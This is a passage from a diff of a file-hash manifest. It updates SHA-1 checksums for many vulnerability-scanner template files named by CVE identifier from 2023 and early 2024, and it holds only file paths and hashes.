-http/cves/2023/CVE-2023-39110.yaml:438e5a17629cb1800f6c53b4313a9e93c97248ea +http/cves/2023/CVE-2023-3847.yaml:19741808d71bd63c323ccebb3f1d2ba9ef1de84d +http/cves/2023/CVE-2023-3848.yaml:2ee0f1cd35093ecbc95d6463be4d7c0b96be887d +http/cves/2023/CVE-2023-3849.yaml:f55bec87afdb536995985bc94a3a789752373543 +http/cves/2023/CVE-2023-38501.yaml:7d6a6df111f2736db6f28c4f5b8f70bc26903486 +http/cves/2023/CVE-2023-38646.yaml:cc57e9d1027bbe9145a4a8e1f1e88156deb06350 +http/cves/2023/CVE-2023-38964.yaml:e1c3467ec6d109844705546205c87d038110b216 +http/cves/2023/CVE-2023-39002.yaml:52ebe9dff5ee28922febf801a3bb95030da8acad +http/cves/2023/CVE-2023-39026.yaml:041116b66d543937bdc51c4430296fb2a3b5b8a3 +http/cves/2023/CVE-2023-39108.yaml:c1b83450ef1e0a64d4b9d9eae5406929006b9806 +http/cves/2023/CVE-2023-39109.yaml:127b33851616ea34701f58d253e55e469a64571d +http/cves/2023/CVE-2023-39110.yaml:de40021a1ae0f2751f435cc3884f568ce795422a http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:bc88d2b87ea3588e113375c468f3110966db9e99 -http/cves/2023/CVE-2023-39143.yaml:54033c211aa0242597737d53de3b07a9bb548363 -http/cves/2023/CVE-2023-3936.yaml:7b2e238b1483242fedc77cd468f0c60f05b5ecbb -http/cves/2023/CVE-2023-39361.yaml:f28752fc93eaf34fa6ee0d92fd8b41279a894b3f -http/cves/2023/CVE-2023-39598.yaml:40946b09a3f8dde729d593ed391d6e45799e8a42 -http/cves/2023/CVE-2023-39600.yaml:f774a24fbab476153d8a33f4383444010e06ee68 -http/cves/2023/CVE-2023-39676.yaml:329b171fd9c8d0287ce60590e181b91c5489fc0f -http/cves/2023/CVE-2023-39677.yaml:10f9751e17d7ff258e3fc9de4b87c359d1f4473c -http/cves/2023/CVE-2023-39700.yaml:9129c0e52271b65b3befbd566a9c83d5c6d9b271 -http/cves/2023/CVE-2023-39796.yaml:cedf5e17d369ec6c9680c9d1b34263ace14b06a3 -http/cves/2023/CVE-2023-40208.yaml:1dd48591ad77fecbe10a9145b424a7c13df680a9 -http/cves/2023/CVE-2023-40355.yaml:480982185506d4e2514ca70e859469a3d6feaea8 -http/cves/2023/CVE-2023-40779.yaml:50ffb7b2d8996d5463b0dcd49b39f289b1bf5cb0 -http/cves/2023/CVE-2023-4110.yaml:83a5412a8658f0cfa575c1afef4ff9f72fd13adc -http/cves/2023/CVE-2023-41109.yaml:909503a144166c013a019c308f03f54245d977a4 -http/cves/2023/CVE-2023-4111.yaml:967c8b8cfc36a18075d01be1bd4f060385725170 -http/cves/2023/CVE-2023-4112.yaml:8472826ad9a2195b2ae87e16a3c751e5a9d59b53 -http/cves/2023/CVE-2023-4113.yaml:2a95405a7a3839030aaf13fb9682016ab1a8c6bc -http/cves/2023/CVE-2023-4114.yaml:f8f216cd98f2a0dc8a41cb9a68559a909fdca8ee -http/cves/2023/CVE-2023-4115.yaml:4d4f4999a961cd853c83f4677593e1129d1d492c -http/cves/2023/CVE-2023-4116.yaml:fbf413721a65ce055a6a488c01acbc3210e4165a -http/cves/2023/CVE-2023-41265.yaml:221d460584c48862bd02b6a95adb57495072bf8a -http/cves/2023/CVE-2023-41266.yaml:cdd799d3d68f3f4d0f9b35b859b85a0cc46c3569 -http/cves/2023/CVE-2023-4148.yaml:99d9cb706be2516854e4eaf6adb2198ceb81d70c -http/cves/2023/CVE-2023-41538.yaml:05fef92bc65dfc377d8e2bd4e748854008d15f83 -http/cves/2023/CVE-2023-41642.yaml:85e9a87e453bca32dc0d6a26d2bb9cd6ab76cd1b -http/cves/2023/CVE-2023-4168.yaml:4f8a8609015bf5238de8c60244a261ff1cc0c718 -http/cves/2023/CVE-2023-4169.yaml:779d2305e6e0e6059b2c41a9f8424c1bebef4d6b -http/cves/2023/CVE-2023-4173.yaml:0693b2d54c9eb5c68a1cda96d07e0eeea6e65863 -http/cves/2023/CVE-2023-4174.yaml:0482b030fdc2e3690dcbda6c9174670b44030826 -http/cves/2023/CVE-2023-41763.yaml:85f07f1f1e1cbf13286e651671373096d437ac18 -http/cves/2023/CVE-2023-41892.yaml:26004dc155f05de0936d3fbaf9ba9d01ddb0af9d +http/cves/2023/CVE-2023-39141.yaml:107751338e25ebbd981829c2d937e9a1f8f60c31 +http/cves/2023/CVE-2023-39143.yaml:e20d6dbb9d5c577e44cf112ff83030e9e694bc11 +http/cves/2023/CVE-2023-3936.yaml:8286c086051a0b10e973d57c92c958e57a5257dd +http/cves/2023/CVE-2023-39361.yaml:3e466a41d9e0eade6589f47678451baf6ebbbebc +http/cves/2023/CVE-2023-39598.yaml:b6cbf6f5f31905988a1568ec0ad02d638a60c8a5 +http/cves/2023/CVE-2023-39600.yaml:f594f2061238379154bf97dcf1ff8830362c94b4 +http/cves/2023/CVE-2023-39676.yaml:6ae66310705d77a801f51b24c4f23badc1f9ffd9 +http/cves/2023/CVE-2023-39677.yaml:ccad01e66e9c6cbfa8c85c6946710f37fb4be991 +http/cves/2023/CVE-2023-39700.yaml:f31e713f3b9d4e03948d00ad0d94e84fc08d13d3 +http/cves/2023/CVE-2023-39796.yaml:652e2a7957da667b3dd805940d9de12d10e0ce7e +http/cves/2023/CVE-2023-40208.yaml:d26fb10881a5128ffe3884f4ae0c5df84784fd98 +http/cves/2023/CVE-2023-40355.yaml:e830e5b4bfdd4361ebf7066155078da07a178821 +http/cves/2023/CVE-2023-40779.yaml:79d01a88f26d82c5f4256632542249ca4e6ae608 +http/cves/2023/CVE-2023-4110.yaml:0093d833acd76053a647314f2896e274d1254cff +http/cves/2023/CVE-2023-41109.yaml:58697d5ce98d5cc1842596763241100ff1afb0b4 +http/cves/2023/CVE-2023-4111.yaml:ae83919e66a9f5addc96ea0f7f859e8c08ff9115 +http/cves/2023/CVE-2023-4112.yaml:f148ae909334c925f571ce9de4ce07fabfb16d89 +http/cves/2023/CVE-2023-4113.yaml:389451cef87bb8ffaabfc8213665370d035280e1 +http/cves/2023/CVE-2023-4114.yaml:a22313e17040379001d1e9eef07dc34529e2249b +http/cves/2023/CVE-2023-4115.yaml:0eb9bb4aaea99ff7103d00edb065f20f52a7d2eb +http/cves/2023/CVE-2023-4116.yaml:e91e80aad8c3b22ff58d3a6535088b3a36f284af +http/cves/2023/CVE-2023-41265.yaml:5f472d26913bc18ac633b38588b85a1346d74bb6 +http/cves/2023/CVE-2023-41266.yaml:71f32d9b3d35beba978e80492799b8e3ebeebaef +http/cves/2023/CVE-2023-4148.yaml:49e8f3a0a99a43b86cf98bf0aa5987008f76118f +http/cves/2023/CVE-2023-41538.yaml:c9051b5fe3e82378f98ff3d81323ec2b7c0f09ed +http/cves/2023/CVE-2023-41642.yaml:45ca13061c37fa3cd5e207717a72a365a1387207 +http/cves/2023/CVE-2023-4168.yaml:9155e9ec28f2164a98ee91eb94a8068c65893efe +http/cves/2023/CVE-2023-4169.yaml:52b490d095332be0ae34ac4b731f5e9e717fc128 +http/cves/2023/CVE-2023-4173.yaml:86e4e5336155967198130352e74e6959e95444b6 +http/cves/2023/CVE-2023-4174.yaml:fa3a8f00b09fc61884d81b2d8b65086459cb417c +http/cves/2023/CVE-2023-41763.yaml:fd53172133c81d605446ea08aba8b5c917baad00 +http/cves/2023/CVE-2023-41892.yaml:4eb18a27213425ee06bf5bf2d68c9d59d7cf6189 http/cves/2023/CVE-2023-42343.yaml:c1bffaa8664049b88b3f225dccf9b3e372fdf1bd http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9 -http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf -http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4 -http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f -http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 -http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 -http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 -http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d -http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f -http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 -http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb -http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e -http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 -http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 -http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 -http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 -http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b -http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e -http/cves/2023/CVE-2023-4542.yaml:d7b83fe18ec05683bd8001dcb749dd505d93c3ff -http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 -http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 -http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf -http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e -http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 -http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 -http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb -http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa -http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 -http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 -http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:0291b05889fcafa128183288afb7bd84e7db4b00 +http/cves/2023/CVE-2023-42442.yaml:5b93bd3379eb1286c01369b8ac0db7274951a209 +http/cves/2023/CVE-2023-42793.yaml:7609627dfc943e8a98e63a223c2666acbe6f88be +http/cves/2023/CVE-2023-43177.yaml:3fc70b3e12cd6c102e9a912a5ec99deda74fb2d9 +http/cves/2023/CVE-2023-43187.yaml:bc5c5b9d077e21da92d16d832b6bdfbaa107b85b +http/cves/2023/CVE-2023-43208.yaml:9571171f304a06c1e2e175e83f87717c7574d327 +http/cves/2023/CVE-2023-43261.yaml:353153b24243a42ec58e7d82b93ca737b0f44081 +http/cves/2023/CVE-2023-43325.yaml:dea8bfbceeb76f9949bcbe3953c866b40e42b9f6 +http/cves/2023/CVE-2023-43326.yaml:e65d5e0574b5dbb97f7f15499a1dfd45cc9bd8af +http/cves/2023/CVE-2023-43374.yaml:4390a5192fbce5dcd0ae6cbaea3baac59ea72a17 +http/cves/2023/CVE-2023-43795.yaml:04fb141516ef06b963bd3c63b4b41f3e901f6b54 +http/cves/2023/CVE-2023-4415.yaml:ef3f313e45a4a534af38945a6409948358549ae3 +http/cves/2023/CVE-2023-44352.yaml:2f065bd348decd9a4ef21471a01821dfd7e64e74 +http/cves/2023/CVE-2023-44353.yaml:29dc295e3d7d42134ad3c53ce51c6f2263134055 +http/cves/2023/CVE-2023-4451.yaml:c5b9465bf0dc2e2f9631d686d15d0e616cb4489d +http/cves/2023/CVE-2023-44812.yaml:ee661e9f8e533aadb1b5646815991b454d5f1a50 +http/cves/2023/CVE-2023-44813.yaml:f8897152666aadf2fb7a52d8317115f24321b469 +http/cves/2023/CVE-2023-4521.yaml:cd4aff1800214d7703661498ae91ee2101070b4a +http/cves/2023/CVE-2023-45375.yaml:36bdf1a241658b6b389fe31a66d62e913d9217dd +http/cves/2023/CVE-2023-4542.yaml:7796c7d2400f3188394c96d287f226ee141b7d0b +http/cves/2023/CVE-2023-4547.yaml:757165c5376f308ea1d88713aa90b620c94b6949 +http/cves/2023/CVE-2023-45542.yaml:fbab2269d3d329f1ac722842d4852760eb4a33f4 +http/cves/2023/CVE-2023-45671.yaml:44371e98ac18a13b6f4913a31db8b25bf8a6976f +http/cves/2023/CVE-2023-4568.yaml:499f357c250a5fe0e30c20955f817a63c4ead9a6 +http/cves/2023/CVE-2023-45852.yaml:b6e39de864aba6e0fe97f4a681d46e2f3a364238 +http/cves/2023/CVE-2023-45855.yaml:ea4416c0b3b510bbe87c43955e30a945834d1566 +http/cves/2023/CVE-2023-4596.yaml:0cd82451c3af3de042fb9028a37d07e9cf29983a +http/cves/2023/CVE-2023-4634.yaml:9911ff9ad5e096083e2f8082a22b868aa7f261a3 +http/cves/2023/CVE-2023-46347.yaml:bb0f1e67bb28da1b426e41802d4bb0d6f61035ec +http/cves/2023/CVE-2023-46359.yaml:e099ca11dccb079f80b7a6a2f428506692b5bc83 +http/cves/2023/CVE-2023-46574.yaml:d047c8594bd07e24c92dce889e0c211c73b7dd22 +http/cves/2023/CVE-2023-46747.yaml:70d00d50e355533780d4855cf0360b20144f8afc +http/cves/2023/CVE-2023-46805.yaml:49bde9b8955972ec5ac1dd765914358605c31f92 http/cves/2023/CVE-2023-47115.yaml:f5f0d4869bc075f448f560f87f29febd4cc63497 -http/cves/2023/CVE-2023-4714.yaml:954bbf773a17e757e0e6643ef410202037e7c8f1 -http/cves/2023/CVE-2023-47211.yaml:bf40361838f0afc267bc6c62161b3f0526a2b234 -http/cves/2023/CVE-2023-47218.yaml:17dcf8eb7f320608649c5031de12070b46a11ebf -http/cves/2023/CVE-2023-47246.yaml:87b56eba15f5c19a9a03e679fb770600520ea2d1 -http/cves/2023/CVE-2023-47643.yaml:77261db868e2b2788787eb158eb22f6238707b3c +http/cves/2023/CVE-2023-4714.yaml:9e54ad7ef07ff844f390a7b8b884063dd3491f74 +http/cves/2023/CVE-2023-47211.yaml:e1381355d1efad0bda01b17816a75d6df2972bb3 +http/cves/2023/CVE-2023-47218.yaml:b0c24c4a4961ef70ed0cd35250c8c70f00cde6fd +http/cves/2023/CVE-2023-47246.yaml:04af302e2804cdab8c72c3a73c19b91db29a646c +http/cves/2023/CVE-2023-47643.yaml:0eea9fe823d7a83cb7b1399798a95d421841fa63 http/cves/2023/CVE-2023-48023.yaml:4df3bf24775e2c4cd1e3225aaed8e9ab7ee2c73e -http/cves/2023/CVE-2023-48084.yaml:45180a45c8d4bb126de978c630e437e3b5be4861 +http/cves/2023/CVE-2023-48084.yaml:b5181539e5c575cfeac27ad62e94f9e2459b7ced http/cves/2023/CVE-2023-48777.yaml:c747ded46f8e3a84ce76d1c7936d28733c2c8cb7 -http/cves/2023/CVE-2023-49070.yaml:ea832772cb56e40e0acc8527138089777b673f16 -http/cves/2023/CVE-2023-49103.yaml:8eab68a4f41466e6d9bef692647cc9e86969bd49 -http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 -http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664 -http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 -http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e -http/cves/2023/CVE-2023-5003.yaml:f7da2dff91d97d8c63abb7faf35019a0bb73906a -http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f -http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c -http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6 -http/cves/2023/CVE-2023-50917.yaml:3cbb771d64638cd5a059e46d07b3b4d7d7748285 -http/cves/2023/CVE-2023-50968.yaml:bab623e4b6cb88b943b91d6825d34d007503754b -http/cves/2023/CVE-2023-51467.yaml:9878c789d7c85882dd19de5043facfc96af7ea1e -http/cves/2023/CVE-2023-52085.yaml:aa1fc00f87c229fda933d8738697fe6899c791ec -http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5 -http/cves/2023/CVE-2023-5360.yaml:2ab7c61990737a8776592831e8189ff751935ab9 -http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 -http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 -http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 -http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 -http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3 -http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 -http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 -http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 -http/cves/2023/CVE-2023-6023.yaml:c537c8a9c6bae27008abc07163a9f67f083e77c1 -http/cves/2023/CVE-2023-6038.yaml:38ab1d22eb9a68f42042f232196bd556273e75e1 -http/cves/2023/CVE-2023-6063.yaml:ce30538ac7371880f65b9247ca0da8dd6e844c05 -http/cves/2023/CVE-2023-6065.yaml:5583e9a287accbae3c6b84b7f5b4c3e4105e4cea -http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341 -http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6 -http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0 -http/cves/2023/CVE-2023-6380.yaml:24e6506046fab035c83ce942b572d9389c88df15 -http/cves/2023/CVE-2023-6389.yaml:a7849d4aba637c66da0d3d08b08158b6ccfcd27d -http/cves/2023/CVE-2023-6553.yaml:7976983a9d94d1562386621c7528c4e1af07ee89 -http/cves/2023/CVE-2023-6567.yaml:83818566ad0764aa9933b7f1905075c40b645479 -http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9 -http/cves/2023/CVE-2023-6634.yaml:d517962a1689dbbaefe2ea502e451ba9009f1dd5 -http/cves/2023/CVE-2023-6831.yaml:d1a44c75188bceced79fce8fe5b7f31e1e824e4b -http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60 -http/cves/2023/CVE-2023-6895.yaml:280030bb44a21b5263dd9f29092154566d82fde7 -http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f -http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 -http/cves/2023/CVE-2023-6989.yaml:c3d929a1f1abf5fa521c9d3ea494ca2646d12c14 -http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac -http/cves/2024/CVE-2024-0195.yaml:8e306f17c007cae746c4d60abb6b6ee5e6189485 -http/cves/2024/CVE-2024-0200.yaml:b56dea46f7628a62b55f121e4d4ca7716460590f -http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49 -http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe -http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8 -http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3 -http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8 -http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241 +http/cves/2023/CVE-2023-49070.yaml:65e0930328b458ab7e4213c9782efa52b73fb507 +http/cves/2023/CVE-2023-49103.yaml:f5757f90f945c79084ee7a8e4431ccf8bdecc58c +http/cves/2023/CVE-2023-4966.yaml:1a39adf34b4332b05432f084bdda7d88bfb899c4 +http/cves/2023/CVE-2023-4973.yaml:9d8c23669f0b1fb8ef2f819f6ff0df9e838816d6 +http/cves/2023/CVE-2023-4974.yaml:95265a132c2a648c8f300f6b598af0090ed6b7a8 +http/cves/2023/CVE-2023-49785.yaml:3c952b09c12553c59b87955301943b4a7571bc8f +http/cves/2023/CVE-2023-5003.yaml:44df345838430a46851567849110fb4ec89e1e2f +http/cves/2023/CVE-2023-50290.yaml:0da1226999b17e405296b4e45193b418fda58f26 +http/cves/2023/CVE-2023-5074.yaml:e03366c2de9746143fb284e90422d9cf4b2c684a +http/cves/2023/CVE-2023-5089.yaml:ab5fdcebc0ea3196856dc0b6bfe7b95c5e27a366 +http/cves/2023/CVE-2023-50917.yaml:183f41d5151e36eaadb744564a2f3e9dd830b72e +http/cves/2023/CVE-2023-50968.yaml:b1faf39acf862d06ffda53e8710e8cf1afae17e8 +http/cves/2023/CVE-2023-51467.yaml:c0eb1dcb70d547279a1e26e464acea6f9332ae0a +http/cves/2023/CVE-2023-52085.yaml:f1a43c0e82be4e6ae94f5403b92df1173f1a7786 +http/cves/2023/CVE-2023-5244.yaml:7c81d0654ee6997857ff2bc8db90c9ed2ce2b2f5 +http/cves/2023/CVE-2023-5360.yaml:5a0953946a042f7a8fd406380fa54b3088f7f643 +http/cves/2023/CVE-2023-5375.yaml:0ec7f1a46cd93b5d2d78086baccb701fa2af2207 +http/cves/2023/CVE-2023-5556.yaml:b6c708adff651f31ba82db7bc458982513ebe287 +http/cves/2023/CVE-2023-5830.yaml:58fcd24876880ad298f4b9827096c3f95d443577 +http/cves/2023/CVE-2023-5914.yaml:a7a4abc8e632a96c541984a6e47b834f1a931037 +http/cves/2023/CVE-2023-5991.yaml:71a29af2239b64d52ad3aa7bb799c284d74ac2f1 +http/cves/2023/CVE-2023-6018.yaml:0cf547ac6737dc4aec9443e34e331cd477e63f34 +http/cves/2023/CVE-2023-6020.yaml:12c27a4b3c8ba5a23f1deaa5a751adbdde5aca0e +http/cves/2023/CVE-2023-6021.yaml:78b6bcae9d5a27f05380dccf231430030f86b377 +http/cves/2023/CVE-2023-6023.yaml:647fa12f828736a1e60899d855c2ee3413776f04 +http/cves/2023/CVE-2023-6038.yaml:edbf511e8df255d81032508ae0db5da0878e9306 +http/cves/2023/CVE-2023-6063.yaml:3aff55fe4445b86e5ef515902a0460a5a683440a +http/cves/2023/CVE-2023-6065.yaml:43d54ded80789f0d3854c9f6a8af5f2a4d745be1 +http/cves/2023/CVE-2023-6114.yaml:f90be5554fc97d768bfb627c3a898da9663f8db4 +http/cves/2023/CVE-2023-6360.yaml:6e0753aac7b53d1c7bc9ae41a078eb0582912162 +http/cves/2023/CVE-2023-6379.yaml:613d522af5db85c143fdcc2b38dfaa26ca136ef0 +http/cves/2023/CVE-2023-6380.yaml:859a707d6c9c81e4c3e8781a3beff189b51c8f49 +http/cves/2023/CVE-2023-6389.yaml:d0ed9d0fd87114fa3f29d8a4165d42fe6c79f343 +http/cves/2023/CVE-2023-6553.yaml:b2e33e3f496ce2052a849e370f8a9f4f52e619f2 +http/cves/2023/CVE-2023-6567.yaml:1d4f79dc0de243eab84fc5ac41220aac35476c2e +http/cves/2023/CVE-2023-6623.yaml:95a28cb42b74962a876414ea6387f16836f5ba48 +http/cves/2023/CVE-2023-6634.yaml:58d0acfc67990c665c1a4dd288d7735aab2a1999 +http/cves/2023/CVE-2023-6831.yaml:6660cec376c2fd84924762f057aaf7739a8e7afc +http/cves/2023/CVE-2023-6875.yaml:3b87c1cc3387c7eefb5a420057312c9416d4e191 +http/cves/2023/CVE-2023-6895.yaml:7ff1cccef6008880bb745da89ab0776719f590c9 +http/cves/2023/CVE-2023-6909.yaml:7f1c1674a74c530291653e3e4af3a8a7064b8176 +http/cves/2023/CVE-2023-6977.yaml:62a94baffe86139a9983e2b81d2b6bb522ab72d1 +http/cves/2023/CVE-2023-6989.yaml:fb7348efce4dfc99db7b9a2d0216d4c6cba74f6e +http/cves/2023/CVE-2023-7028.yaml:5e8b05b284c13ecabce6ee3c42d1804054abdb56 +http/cves/2024/CVE-2024-0195.yaml:9a92a4d8719e68413de8d1fade2119e0a623f21d +http/cves/2024/CVE-2024-0200.yaml:62d03d5fdc128f489257fefda03aa4ac148b510a +http/cves/2024/CVE-2024-0204.yaml:c94c5ccdd259b91be5958278994a3f6e228c0eef +http/cves/2024/CVE-2024-0235.yaml:a22bdc7ca804a6d0311f17c87cce6d5cf903825f +http/cves/2024/CVE-2024-0305.yaml:6bf530b827ae9684e18b3fbf2ae8210d0f724155 +http/cves/2024/CVE-2024-0337.yaml:f77b7bd1d93eda04a6aaf94f99ac1766cceda25c +http/cves/2024/CVE-2024-0352.yaml:c262817270ffae9efcec3d8996ea81f3f7b8b3fe +http/cves/2024/CVE-2024-0713.yaml:68de9c6afca59de5238a26024c82547a6ba57cea http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 -http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7 +http/cves/2024/CVE-2024-1021.yaml:81d7ffc9d132b673f7757d6b08c2dbd2847a0f9b http/cves/2024/CVE-2024-1061.yaml:df85be53c1a8e56e06eb9abf580e173b7d9b984d -http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c +http/cves/2024/CVE-2024-1071.yaml:3af798153fa941a00376b2dc03502960fbc1f36d http/cves/2024/CVE-2024-1183.yaml:13a0cbff374005b467ac0b663f895021b5d981a8 -http/cves/2024/CVE-2024-1208.yaml:e0b4c4dbc3dc37bbb522622e5dd6c882f02b05b8 -http/cves/2024/CVE-2024-1209.yaml:27b88d76f172f9a3c7c01d857a8dd533409f030e -http/cves/2024/CVE-2024-1210.yaml:a67c76ea90033f3feb482819f4f7174e76a4c3af +http/cves/2024/CVE-2024-1208.yaml:287c09eb17c7864442f835df934c7f4dfa4d520a +http/cves/2024/CVE-2024-1209.yaml:aed0338ee5cf0a1a0ba5e259d5afa5fd9b088df4 +http/cves/2024/CVE-2024-1210.yaml:7eb962fcb42e13310c5eed2005e9d72ba1acacdc http/cves/2024/CVE-2024-1212.yaml:ff3afc7fa9564d0aadd7087edb0eb9e0fd329ffe -http/cves/2024/CVE-2024-1561.yaml:a134c8864733abe3278ebb6cf67a54c36b6ae29f +http/cves/2024/CVE-2024-1561.yaml:1d7ea0ff7ffee2714ab6c591394b11cd5151eab6 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 -http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 -http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d -http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 -http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21683.yaml:1e5be00ea45b6b0b78b88c83572f346333c3feaf -http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df -http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b -http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db -http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d +http/cves/2024/CVE-2024-1709.yaml:af397b8d43398034dfb882a890a13219e972ffdb +http/cves/2024/CVE-2024-20767.yaml:624154e090933ad51bbcb882a5bd52fbf70928cd +http/cves/2024/CVE-2024-21644.yaml:1f73c9ae6bf21e7ca3d0cfabb439ef772287aa7b +http/cves/2024/CVE-2024-21645.yaml:d371558dd931ed3b6eec1e8e7401ca4a0f8b6319 +http/cves/2024/CVE-2024-21683.yaml:4d37563c0e58c53b849999c96fafb1fe173b4ede +http/cves/2024/CVE-2024-21887.yaml:7ded7fecbf1bdede573928e97c3d48f1b6db2a17 +http/cves/2024/CVE-2024-21893.yaml:403d9491255a70d1fd5ae5b41ef554adf01888eb +http/cves/2024/CVE-2024-22024.yaml:d53fc0281004592753093a77fedd54322bc7526d +http/cves/2024/CVE-2024-22319.yaml:727a1cab59ca03b93d1e120f1768ccefd5bbeed4 http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c +http/cves/2024/CVE-2024-22927.yaml:7f2ddc59d05ee8143e928a3a0fdebe32fa8376a1 